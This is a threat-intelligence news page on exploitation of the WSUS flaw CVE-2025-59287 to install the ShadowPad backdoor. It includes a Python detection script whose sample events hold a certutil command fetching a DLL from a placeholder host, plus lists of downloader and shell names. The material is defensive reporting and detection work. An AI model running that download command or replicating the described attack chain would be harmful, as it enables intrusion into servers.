Mallory

ShadowPad Malware Deployed via Exploited WSUS CVE-2025-59287 Vulnerability

Tags: actively-exploited-vulnerability, government-vulnerability-catalog, state-sponsored-espionage, proof-of-concept-release, remote-access-implant
Updated March 21, 2026 at 03:19 PM (4 sources)

Threat actors have exploited a critical deserialization vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, to gain remote code execution with system privileges and deploy the ShadowPad backdoor. The attackers targeted publicly exposed WSUS-enabled Windows Servers, using the PowerCat utility to obtain a system shell and then leveraging legitimate Windows tools such as curl.exe and certutil.exe to download and install ShadowPad from an external server. ShadowPad, a modular backdoor associated with Chinese state-sponsored groups, is loaded via DLL side-loading techniques, specifically using a legitimate binary to execute a malicious DLL payload in memory.

The vulnerability, which was patched by Microsoft in October, allows remote, unauthenticated attackers to trigger unsafe deserialization of AuthorizationCookie objects, leading to full system compromise. Security researchers from AhnLab and others have documented the attack chain, noting that the flaw has been added to CISA's Known Exploited Vulnerabilities catalog and that a public proof-of-concept exploit is available. The incident highlights the ongoing risk posed by unpatched WSUS servers and the sophisticated methods used by threat actors to maintain persistence and evade detection once ShadowPad is installed.
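The process chain described above (the WSUS worker ends up spawning a shell, which then runs certutil.exe or curl.exe to fetch the implant) can be caught from process-creation telemetry by walking parent links. The following is an added Python example and not code from the page's sources; the Sysmon-style record format, the sample events, and the WSUS-side process names (the IIS worker hosting the WsusPool and the WSUS service) are constructed assumptions to adapt to your own telemetry.

```python
import re

# Assumed process names for the WSUS side of the chain (IIS worker hosting
# the WsusPool and the WSUS service); adjust to match your own telemetry.
WSUS_WORKERS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value; quoted values may hold spaces

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    r'pid=3200 ppid=900 image="C:\Windows\System32\inetsrv\w3wp.exe" cmdline="w3wp.exe -ap WsusPool"',
    r'pid=4100 ppid=3200 image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c powershell -nop"',
    r'pid=4120 ppid=4100 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell -nop"',
    r'pid=4300 ppid=4120 image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -urlcache -f http://placeholder.invalid/p.dll C:\ProgramData\p.dll"',
    r'pid=1000 ppid=500 image="C:\Windows\explorer.exe" cmdline="explorer.exe"',
    r'pid=5000 ppid=1000 image="C:\Windows\System32\curl.exe" cmdline="curl.exe -s https://placeholder.invalid/ -o C:\Temp\f.txt"',
]

def parse_event(line):
    """Return {'pid', 'ppid', 'image' (lower-cased basename), 'cmdline'} for one record."""
    f = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
    return {"pid": int(f["pid"]), "ppid": int(f["ppid"]),
            "image": f["image"].rsplit("\\", 1)[-1].lower(), "cmdline": f["cmdline"]}

def detect_wsus_download_chain(lines, max_depth=6):
    """Alert on certutil/curl whose process ancestry (within max_depth hops) reaches a WSUS worker."""
    # Each alert records the chain, whether a shell sits between worker and downloader
    # (the PowerCat stage in the report) and whether the command line carries a URL.
    events = [parse_event(ln) for ln in lines]
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["image"] not in DOWNLOADERS:
            continue
        chain, p = [e["image"]], by_pid.get(e["ppid"])
        while p is not None and len(chain) < max_depth:
            chain.append(p["image"])
            if p["image"] in WSUS_WORKERS:
                break
            p = by_pid.get(p["ppid"])
        if chain[-1] in WSUS_WORKERS:
            alerts.append({"pid": e["pid"], "chain": " <- ".join(chain),
                           "via_shell": any(s in chain for s in SHELLS),
                           "fetches_url": bool(URL_RE.search(e["cmdline"]))})
    return alerts
```

The benign curl launched from explorer.exe in the sample produces no alert because its ancestry never reaches a WSUS worker; only the certutil download under the w3wp.exe-spawned shell is flagged.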

Timeline

  1. Nov 25, 2025

    Researchers attribute campaign to China-linked APT groups

    Security reporting linked the ShadowPad deployment campaign to Chinese state-aligned threat actors, with references to groups such as APT41, APT10, and PLA-affiliated clusters. The activity was described as targeting sectors including manufacturing, telecom, and energy.

  2. Nov 25, 2025

    CISA adds CVE-2025-59287 to the KEV catalog

    Following evidence of active exploitation, CISA added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog and pushed for urgent remediation. Subsequent reporting also described mandated or strongly urged patching and access restrictions for affected organizations.

  3. Nov 24, 2025

    AhnLab documents active ShadowPad intrusions via WSUS

    AhnLab Security Intelligence Center reported observing the WSUS exploitation chain in the wild, detailing the use of legitimate Windows binaries and the delivery of ShadowPad. Its findings provided technical confirmation of ongoing attacks against publicly exposed WSUS instances.

  4. Nov 24, 2025

    Threat actors exploit WSUS flaw to deploy ShadowPad

    Attackers actively exploited CVE-2025-59287 to gain SYSTEM-level access on WSUS servers, using PowerCat for shell access and certutil and curl to download ShadowPad. The malware was deployed via DLL sideloading and used persistence and anti-detection techniques, with some intrusions also involving reconnaissance and tools such as Velociraptor.

  5. Oct 1, 2025

    Public PoC exploit for CVE-2025-59287 triggers rapid weaponization

    After proof-of-concept exploit code for CVE-2025-59287 was publicly released, attackers quickly began weaponizing the flaw against exposed WSUS servers. Reports describe this publication as the catalyst for active exploitation.

  6. Oct 1, 2025

    Microsoft patches critical WSUS RCE flaw CVE-2025-59287

    Microsoft released an out-of-band patch for CVE-2025-59287, a critical unsafe deserialization flaw in the WSUS GetCookie() endpoint that can allow unauthenticated remote code execution as SYSTEM. Multiple reports place the patch release in October 2025.


Related Stories

Remote Code Execution Vulnerabilities in Microsoft Update Services Exploited

A critical remote code execution (RCE) vulnerability was discovered in Microsoft's Update Health Tools (KB4023057), a utility designed to facilitate rapid security updates via Intune. Researchers found that a misconfiguration involving abandoned Azure blob storage allowed attackers to register a storage account and receive requests from vulnerable devices worldwide, enabling arbitrary code execution. Microsoft has since responded to the disclosure, and newer versions of the tool have addressed the issue, but devices running the original version remain at risk if not updated. Separately, a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, was actively exploited by threat actors to deploy the ShadowPad backdoor malware. Attackers leveraged this flaw to gain system-level access using PowerCat and subsequently installed ShadowPad via `certutil` and `curl`. The exploitation of these vulnerabilities highlights the risks associated with update management tools and the importance of timely patching and secure configuration to prevent compromise by advanced persistent threats.

1 month ago
Microsoft WSUS Remote Code Execution Vulnerability Actively Exploited

Microsoft released an urgent out-of-band security update to address a critical remote code execution vulnerability in Windows Server Update Services (WSUS), identified as CVE-2025-59287. The flaw was reportedly under active exploitation in the wild, prompting Microsoft to issue a comprehensive fix outside of its regular update cycle. Security advisories and industry news highlighted the severity of the vulnerability and its inclusion in the U.S. CISA Known Exploited Vulnerabilities catalog, underscoring the immediate risk to organizations relying on WSUS for patch management. The vulnerability allowed attackers to potentially execute arbitrary code on affected WSUS servers, posing a significant threat to enterprise environments. Security experts urged organizations to apply the patch without delay to mitigate the risk of compromise. The rapid response from Microsoft and the attention from security agencies reflect the critical nature of the flaw and the ongoing threat landscape targeting core infrastructure components like WSUS.

1 month ago
Critical RCE Vulnerability in Microsoft WSUS via Unsafe Cookie Deserialization

Microsoft has released emergency out-of-band security updates to address a critical remote code execution (RCE) vulnerability in Windows Server Update Services (WSUS), tracked as CVE-2025-59287. The flaw, rated CVSS 9.8, allows unauthenticated attackers to exploit unsafe deserialization in the WSUS AuthorizationCookie mechanism, enabling arbitrary code execution with SYSTEM privileges. Proof-of-concept exploit code for this vulnerability is publicly available, increasing the urgency for organizations to patch affected systems immediately. The vulnerability affects only Windows servers with the WSUS Server Role enabled, and Microsoft has provided security updates for all supported Windows Server versions, along with workarounds for those unable to patch immediately. Security researcher Batuhan Er from HawkTrace detailed that the vulnerability arises from the unsafe deserialization of AuthorizationCookie objects sent to the `GetCookie()` endpoint, where encrypted cookie data is decrypted and deserialized without proper type validation. This flaw exposes WSUS servers to remote, unauthenticated attacks that require no user interaction and could potentially be wormable between WSUS servers. Microsoft strongly advises administrators to install the provided patches or apply recommended mitigations to prevent exploitation of this critical vulnerability.

1 month ago